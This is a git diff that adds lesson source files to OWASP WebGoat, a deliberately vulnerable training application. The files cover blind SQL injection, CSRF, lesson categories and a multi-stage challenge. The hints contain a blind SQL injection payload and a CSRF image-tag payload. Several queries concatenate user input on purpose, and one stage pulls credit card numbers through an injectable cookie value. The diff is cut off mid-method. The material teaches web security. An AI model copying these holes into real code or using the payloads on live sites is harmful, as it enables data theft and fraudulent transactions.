+			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is"
+			    + "invalid then answer is no.");
+	    hints
+		    .add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br> example: is the second character of the first_name of userid "
+			    + TARGET_ACCT_NUM
+			    + " greater than 'm' (ascii 109)? "
+			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
+			    + TARGET_ACCT_NUM
+			    + ") , 2 , 1) ) > 109 ); "
+			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
+			    + "invalid then answer is no.");
+	}
+	return hints;
+    }
+
+    /**
+     * Gets the instructions attribute of the SqlInjection object
+     * 
+     * @return The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "The form below allows a user to enter an account number and determine if "
+		+ "it is valid or not.  Use this form to develop a true / false test check other entries in the database.  "
+		+ "<br><br>Reference Ascii Values: 'A' = 65   'Z' = 90   'a' = 97   'z' = 122 "
+		+ "<br><br>The goal is to find the value of "
+		+ "the first_name in table user_data for userid "
+		+ TARGET_ACCT_NUM
+		+ ".  Put the discovered name in the form to pass the lesson.  Only the discovered name "
+		+ "should be put into the form field, paying close attention to the spelling and capitalization.";
+
+	return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(70);
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+    /**
+     * Gets the title attribute of the DatabaseFieldScreen object
+     * 
+     * @return The title value
+     */
+    public String getTitle()
+    {
+	return ("Blind SQL Injection");
+    }
+
+    /**
+     * Constructor for the DatabaseFieldScreen object
+     * 
+     * @param s
+     *                Description of the Parameter
+     */
+    public void handleRequest(WebSession s)
+    {
+	try
+	{
+	    super.handleRequest(s);
+	}
+	catch (Exception e)
+	{
+	    System.out.println("Exception caught: " + e);
+	    e.printStackTrace(System.out);
+	}
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
new file mode 100644
index 000000000..e99c9b428
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
@@ -0,0 +1,110 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.StringElement;
+
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class BufferOverflow extends LessonAdapter
+{
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	// just to get the generic how to text.
+	return super.createContent(s);
+    }
+
+
+    /**
+     *  Gets the category attribute of the ForgotPassword object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+
+	return Category.BUFFER_OVERFLOW;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the HelloScreen object
+     *
+     * @return    The hints value
+     */
+    public List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("Lesson Hint 1");
+	hints.add("Lesson Hint 2");
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(15);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Buffer Overflow");
+    }
+
+
+    public Element getCredits()
+    {
+	return new StringElement(
+		"This screen created by: Your name could go here");
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
new file mode 100644
index 000000000..cc5b293c5
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
@@ -0,0 +1,318 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.apache.ecs.html.TextArea;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+
+ */
+public class CSRF extends LessonAdapter {
+
+	private final static String MESSAGE = "message";
+	private final static int MESSAGE_COL = 3;
+	private final static String NUMBER = "Num";
+	private final static int NUM_COL = 1;
+	private final static String STANDARD_QUERY = "SELECT * FROM messages";
+	private final static String TITLE = "title";
+	private final static int TITLE_COL = 2;
+	private static int count = 1;
+	private final static int USER_COL = 4;	// Added by Chuck Willis - used to show user who posted message
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	
+	/**
+	 *  Adds a feature to the Message attribute of the MessageBoardScreen object
+	 *
+	 * @param  s  The feature to be added to the Message attribute
+	 */
+	protected void addMessage( WebSession s )
+	{
+		try
+		{
+			String title = HtmlEncoder.encode( s.getParser().getRawParameter( TITLE, "" ) );
+			String message = s.getParser().getRawParameter( MESSAGE, "" );
+
+			Connection connection = DatabaseUtilities.getConnection( s );
+
+			String query = "INSERT INTO messages VALUES (?, ?, ?, ? )";
+
+			PreparedStatement statement = connection.prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+			statement.setInt(1, count++);
+			statement.setString(2, title);
+			statement.setString(3, message);
+			statement.setString(4, s.getUserName());
+			statement.executeQuery();
+		}
+		catch ( Exception e )
+		{
+			// ignore the empty resultset on the insert.  There are a few more SQL Injection errors
+			// that could be trapped here but we will let them try.  One error would be something
+			// like "Characters found after end of SQL statement." 
+			if ( e.getMessage().indexOf("No ResultSet was produced") == -1 )
+			{	
+				s.setMessage( "Could not add message to database" );
+			}
+		}
+	}
+	
+	@Override
+	protected Element createContent(WebSession s) {
+		ElementContainer ec = new ElementContainer();
+		
+		addMessage( s );
+		ec.addElement( makeInput( s ) );
+		ec.addElement( new HR() );
+		ec.addElement( makeCurrent( s ) );
+		ec.addElement( new HR() );
+		ec.addElement( makeList( s ) );
+		
+		return ec;
+	}
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	protected Element makeInput( WebSession s )
+	{
+		Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+		TR row1 = new TR();
+		TR row2 = new TR();
+		row1.addElement( new TD( new StringElement( "Title: " ) ) );
+
+		Input inputTitle = new Input( Input.TEXT, TITLE, "" );
+		row1.addElement( new TD( inputTitle ) );
+
+		TD item1 = new TD();
+		item1.setVAlign( "TOP" );
+		item1.addElement( new StringElement( "Message: " ) );
+		row2.addElement( item1 );
+
+		TD item2 = new TD();
+		TextArea ta = new TextArea( MESSAGE, 5, 60 );
+		item2.addElement( ta );
+		row2.addElement( item2 );
+		t.addElement( row1 );
+		t.addElement( row2 );
+
+		Element b = ECSFactory.makeButton( "Submit" );
+		ElementContainer ec = new ElementContainer();
+		ec.addElement( t );
+		ec.addElement( new P().addElement( b ) );
+
+		return ( ec );
+	}
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	public Element makeList( WebSession s )
+	{
+		Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection( s );
+
+			Statement statement = connection.createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+			
+			ResultSet results = statement.executeQuery( STANDARD_QUERY + " WHERE user_name LIKE '" + getNameroot( s.getUserName() ) + "%'" );
+
+			if ( ( results != null ) && ( results.first() == true ) )
+			{
+				results.beforeFirst();
+
+				for ( int i = 0; results.next(); i++ )
+				{
+					String link = "<a href='" + getLink() + "&" + NUMBER + "=" + results.getInt( NUM_COL ) +
+					"' style='cursor:hand'>" +  results.getString( TITLE_COL ) + "</a>";
+					TD td = new TD().addElement( link );
+					TR tr = new TR().addElement( td );
+					t.addElement( tr );
+				}
+			}
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error while getting message list." );
+		}
+
+		ElementContainer ec = new ElementContainer();
+		ec.addElement( new H1( "Message List" ) );
+		ec.addElement( t );
+		String transferFunds = s.getParser().getRawParameter("transferFunds" , "");
+		if (transferFunds.length() != 0)
+		{
+			makeSuccess(s);
+		}
+		
+
+		return ( ec );
+	}
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	protected Element makeCurrent( WebSession s )
+	{
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+			int messageNum = s.getParser().getIntParameter( NUMBER, 0 );
+
+			Connection connection = DatabaseUtilities.getConnection( s );
+			
+			String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ?";
+			PreparedStatement statement = connection.prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+			statement.setString(1, getNameroot( s.getUserName() ) + "%");
+			statement.setInt(2, messageNum);
+			ResultSet results = statement.executeQuery();
+
+			if ( ( results != null ) && results.first() )
+			{
+				ec.addElement( new H1( "Message Contents For: " + results.getString( TITLE_COL )) );
+				Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+				TR row1 = new TR( new TD( new B(new StringElement( "Title:" )) ) );
+				row1.addElement( new TD( new StringElement( results.getString( TITLE_COL ) ) ) );
+				t.addElement( row1 );
+
+				String messageData = results.getString( MESSAGE_COL );
+				TR row2 = new TR( new TD( new B(new StringElement( "Message:" )) ) );
+				row2.addElement( new TD( new StringElement( messageData ) ) );
+				t.addElement( row2 );
+											
+				TR row3 = new TR( new TD( new StringElement( "Posted By:" ) ) );
+				row3.addElement( new TD( new StringElement( results.getString( USER_COL ) ) ) );
+				t.addElement( row3 );
+								
+				ec.addElement( t );
+								
+			}
+			else
+			{
+				if ( messageNum != 0 )
+				{
+					ec.addElement( new P().addElement( "Could not find message " + messageNum ) );
+				}
+			}
+
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error generating " + this.getClass().getName() );
+			e.printStackTrace();
+		}
+
+		return ( ec );
+	}
+
+	@Override	
+	protected Category getDefaultCategory() {
+		return Category.XSS;
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(120);
+	
+	@Override
+	protected Integer getDefaultRanking() {
+		
+		return DEFAULT_RANKING;
+	}
+
+	@Override	
+	protected List<String> getHints(WebSession s) {
+		List<String> hints = new ArrayList<String>();
+		hints.add( "Enter some text and try to include an image in there." );
+		hints.add( "In order to make the picture almost invisible try to add width=\"1\" and height=\"1\"." );
+		hints.add( "The format of an image in html is <pre>&lt;img src=\"[URL]\" width=\"1\" height=\"1\" /&gt;</pre>");		
+		hints.add( "Include this URL in the message <pre>&lt;img src='" + getLink() +
+			        "&transferFunds=5000' width=\"1\" height=\"1\" /&gt;</pre>");
+		
+		return hints;
+	}
+
+	/**
+	 *  Gets the title attribute of the MessageBoardScreen object
+	 *
+	 * @return    The title value
+	 */
+	public String getTitle()
+	{
+		return ( "Cross Site Request Forgery (CSRF)" );
+	}
+
+	private static String getNameroot( String name )
+	{
+		String nameroot = name;
+		if (nameroot.indexOf('-') != -1) 
+		{
+			nameroot = nameroot.substring(0, nameroot.indexOf('-')); 
+		}
+		return nameroot;
+	}
+
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+	
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
new file mode 100644
index 000000000..f388b7472
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
@@ -0,0 +1,164 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.Iterator;
+import java.util.List;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class Category implements Comparable
+{
+
+	public final static Category UNVALIDATED_PARAMETERS = new Category("Unvalidated Parameters", new Integer(110));
+
+	public final static Category ACCESS_CONTROL = new Category("Access Control Flaws", new Integer(210));
+
+	public final static Category AUTHENTICATION = new Category("Authentication Flaws", new Integer(310));
+
+	public final static Category SESSION_MANAGEMENT = new Category("Session Management Flaws", new Integer(320));
+
+	public final static Category XSS = new Category("Cross-Site Scripting (XSS)", new Integer(410));
+
+	public final static Category BUFFER_OVERFLOW = new Category("Buffer Overflows", new Integer(510));
+
+	public final static Category INJECTION = new Category("Injection Flaws", new Integer(610));
+
+	public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(710));
+
+	public final static Category INSECURE_STORAGE = new Category("Insecure Storage", new Integer(810));
+
+	public final static Category DOS = new Category("Denial of Service", new Integer(910));
+
+	public final static Category INSECURE_CONFIGURATION = new Category("Insecure Configuration", new Integer(1010));
+
+	public final static Category WEB_SERVICES = new Category("Web Services", new Integer(1110));
+
+	public final static Category AJAX_SECURITY = new Category("AJAX Security", new Integer(1150));
+
+	public final static Category ADMIN_FUNCTIONS = new Category("Admin Functions", new Integer(10));
+
+	public final static Category GENERAL = new Category("General", new Integer(50));
+
+	public final static Category CODE_QUALITY = new Category("Code Quality", new Integer(70));
+
+	public final static Category CONCURRENCY = new Category("Concurrency", new Integer(80));
+
+	public final static Category CHALLENGE = new Category("Challenge", new Integer(2000));
+
+	private static final List<Category> categories = new ArrayList<Category>();
+
+	private String category;
+
+	private Integer ranking;
+
+	static
+	{
+		categories.add(UNVALIDATED_PARAMETERS);
+		categories.add(ACCESS_CONTROL);
+		categories.add(AUTHENTICATION);
+		categories.add(SESSION_MANAGEMENT);
+		categories.add(XSS);
+		categories.add(BUFFER_OVERFLOW);
+		categories.add(INJECTION);
+		categories.add(ERROR_HANDLING);
+		categories.add(INSECURE_STORAGE);
+		categories.add(DOS);
+		categories.add(INSECURE_CONFIGURATION);
+		categories.add(WEB_SERVICES);
+		categories.add(AJAX_SECURITY);
+		categories.add(ADMIN_FUNCTIONS);
+		categories.add(GENERAL);
+		categories.add(CODE_QUALITY);
+		categories.add(CONCURRENCY);
+		categories.add(CHALLENGE);
+	}
+
+	public static synchronized void addCategory(Category c)
+	{
+		categories.add(c);
+	}
+
+	public static synchronized Category getCategory(String name)
+	{
+		Iterator<Category> it = categories.iterator();
+		while (it.hasNext())
+		{
+			Category c = it.next();
+			if (c.getName().equals(name)) return c;
+		}
+		return null;
+	}
+
+	public Category(String category, Integer ranking)
+	{
+		this.category = category;
+		this.ranking = ranking;
+	}
+
+	public int compareTo(Object obj)
+	{
+		int value = 1;
+
+		if (obj instanceof Category)
+		{
+			value = this.getRanking().compareTo(((Category) obj).getRanking());
+		}
+
+		return value;
+	}
+
+	public Integer getRanking()
+	{
+		return ranking;
+	}
+
+	public Integer setRanking(Integer ranking)
+	{
+		return this.ranking = ranking;
+	}
+
+	public String getName()
+	{
+		return category;
+	}
+
+	public boolean equals(Object obj)
+	{
+		return (obj instanceof Category) && getName().equals(((Category) obj).getName());
+	}
+
+	public String toString()
+	{
+		return getName();
+	}
+}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
new file mode 100644
index 000000000..ae55a66a0
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
@@ -0,0 +1,826 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileReader;
+import java.io.FileWriter;
+import java.io.OutputStreamWriter;
+import java.net.DatagramPacket;
+import java.net.DatagramSocket;
+import java.net.InetAddress;
+import java.net.Socket;
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.StringTokenizer;
+import java.util.Vector;
+
+import javax.servlet.http.Cookie;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.Exec;
+import org.owasp.webgoat.util.ExecResults;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class Challenge2Screen extends SequentialLessonAdapter
+{
+	private static final String USER_COOKIE = "user";
+
+	private static final String JSP = ".jsp";
+
+	private static final String WEBGOAT_CHALLENGE = "webgoat_challenge";
+
+	private static final String WEBGOAT_CHALLENGE_JSP = WEBGOAT_CHALLENGE + JSP;
+
+	private static final String PROCEED_TO_NEXT_STAGE = "Proceed to the next stage...";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String CREDIT = "Credit";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String PROTOCOL = "File";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String MESSAGE = "Message";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String PARAM = "p";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String PASSWORD = "Password";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String USER = "s";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String USERNAME = "Username";
+
+	private String pass = "goodbye";
+
+	private String user = "youaretheweakestlink";
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		return super.createStagedContent(s);
+	}
+
+	/**
+	 * Determine the username and password
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected Element doStage1(WebSession s) throws Exception
+	{
+		setStage(s, 1);
+
+		String username = s.getParser().getStringParameter(USERNAME, "");
+		String password = s.getParser().getStringParameter(PASSWORD, "");
+		phoneHome(s, "User: " + user + " --> " + "Pass: " + pass);
+
+		if (username.equals(user) && password.equals(pass))
+		{
+			s.setMessage("Welcome to stage 2 -- get credit card numbers!");
+			setStage(s, 2);
+
+			return (doStage2(s));
+		}
+
+		s.setMessage("Invalid login");
+
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(makeLogin(s));
+
+		// <START_OMIT_SOURCE>
+		// these are red herrings for the first stage
+		Input input = new Input(Input.HIDDEN, USER, "White");
+		ec.addElement(input);
+
+		Cookie newCookie = new Cookie(USER_COOKIE, "White");
+		s.getResponse().addCookie(newCookie);
+		// <END_OMIT_SOURCE>
+
+		return (ec);
+	}
+
+	// get creditcards from database
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		// <START_OMIT_SOURCE>
+
+		Cookie newCookie = new Cookie(USER_COOKIE, "White");
+		s.getResponse().addCookie(newCookie);
+
+		ElementContainer ec = new ElementContainer();
+		if (s.getParser().getStringParameter(Input.SUBMIT, "")
+				.equals(PROCEED_TO_NEXT_STAGE + "(3)"))
+		{
+			s.setMessage("Welcome to stage 3 -- deface the site");
+			setStage(s, 3);
+			// Reset the defaced webpage so the lesson can start over
+			resetWebPage(s);
+			return doStage3(s);
+		}
+
+                Connection connection = DatabaseUtilities.getConnection(s);
+
+		Statement statement3 = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+	
+		// pull the USER_COOKIE from the cookies
+		String user = getCookie(s);
+		String query = "SELECT * FROM user_data WHERE last_name = '" + user + "'";
+		Vector<String> v = new Vector<String>();
+
+		try
+		{
+			ResultSet results = statement3.executeQuery(query);
+
+			while (results.next())
+			{
+				String type = results.getString("cc_type");
+				String num = results.getString("cc_number");
+				v.addElement(type + "-" + num);
+			}
+	    	        if (v.size() != 13)
+			{
+				s.setMessage("Try to get all the credit card numbers");
+		    	}
+	    
+				ec.addElement(buildCart(s));
+
+			Table t = new Table().setCellSpacing(0).setCellPadding(2)
+				.setBorder(0).setWidth("90%").setAlign("center");
+
+				ec.addElement(new BR());
+				TR tr = new TR();
+				tr.addElement(new TD().addElement("Please select credit card for this purchase: "));
+				Element p = ECSFactory.makePulldown(CREDIT, v);
+				tr.addElement(new TD().addElement(p).setAlign("right"));
+				t.addElement(tr);
+
+				tr = new TR();
+				Element b = ECSFactory.makeButton("Buy Now!");
+				tr.addElement(new TD().addElement(b));
+				t.addElement(tr);
+				ec.addElement(t);
+
+				ec.addElement(new BR());
+				Input input = new Input(Input.HIDDEN, USER, "White");
+				ec.addElement(input);
+		
+			//STAGE 3 BUTTON
+			if (v.size() == 13)
+			{
+				s.setMessage("Congratulations! You stole all the credit cards, proceed to stage 3!");
+				ec.addElement(new BR());
+				//TR inf = new TR();
+				Center center = new Center();
+				Element proceed = ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(3)");
+				center.addElement(proceed);
+				//inf.addElement(new TD().addElement(proceed).setAlign("center"));
+				ec.addElement(center);
+			}
+		
+		}
+		catch (Exception e)
+		{
+			s.setMessage("An error occurred in the woods");
+		}
+
+		return (ec);
+		// <END_OMIT_SOURCE>
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	/*
+	 * (non-Javadoc)
+	 * 
+	 * @see lessons.LessonAdapter#doStage3(session.WebSession)
+	 */
+	protected Element doStage3(WebSession s) throws Exception
+	{
+		// <START_OMIT_SOURCE>
+
+		ElementContainer ec = new ElementContainer();
+		if (s.getParser().getStringParameter(Input.SUBMIT, "")
+				.equals(PROCEED_TO_NEXT_STAGE + "(4)"))
+		{
+			setStage(s, 4);
+			// Reset the defaced webpage so the lesson can start over
+			resetWebPage(s);
+			return doStage4(s);
+		}
+
+		// execute the possible attack first to determine if site is defaced.
+		ElementContainer netstatResults = getNetstatResults(s);
+		if (isDefaced(s))
+		{
+			ec.addElement(new HR());
+			s.setMessage("CONGRATULATIONS - You have defaced the site!");
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign(
+					"center");
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+			TR tr = new TR();
+			tr.addElement(new TD().setAlign("center").addElement(
+					ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(4)")));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement(showDefaceAttempt(s)));
+			t.addElement(tr);
+			ec.addElement(t);
+			return ec;
+		} else
+		{
+			// Setup the screen content
+			try
+			{
+				ec.addElement(new H1("Current Network Status:"));
+				ec.addElement(netstatResults);
+
+				Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign(
+						"center");
+				if (s.isColor())
+				{
+					t.setBorder(1);
+				}
+				String[] list = { "TCP", "TCPv6", "IP", "IPv6", "UDP", "UDPv6" };
+
+				TR tr = new TR();
+				tr.addElement(new TD().addElement(ECSFactory.makeButton("View Network")));
+				tr.addElement(new TD().setWidth("35%").addElement(
+						ECSFactory.makePulldown(PROTOCOL, list, "", 5)));
+				t.addElement(tr);
+
+				ec.addElement(t);
+			}
+			catch (Exception e)
+			{
+				ec.addElement(new P()
+						.addElement("Select a message to read from the Message List below"));
+			}
+
+			ec.addElement(new HR());
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign(
+					"center");
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+			TR tr = new TR();
+			tr.addElement(new TD().addElement(showDefaceAttempt(s)));
+			t.addElement(tr);
+			ec.addElement(t);
+		}
+		return (ec);
+		// <END_OMIT_SOURCE>
+	}
+
+	private boolean isDefaced(WebSession s)
+	{
+		// <START_OMIT_SOURCE>
+		boolean defaced = false;
+		try
+		{
+			// get current text and compare to the new text
+			String origpath = s.getContext().getRealPath(
+					WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP);
+			String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP);
+			String defacedText = getFileText(new BufferedReader(new FileReader(origpath)), false);
+			String origText = getFileText(new BufferedReader(new FileReader(masterFilePath)), false);
+
+			defaced = (!origText.equals(defacedText));
+		}
+		catch (Exception e)
+		{
+			e.printStackTrace();
+		}
+		return defaced;
+		// <END_OMIT_SOURCE>
+	}
+
+	private Element showDefaceAttempt(WebSession s) throws Exception
+	{
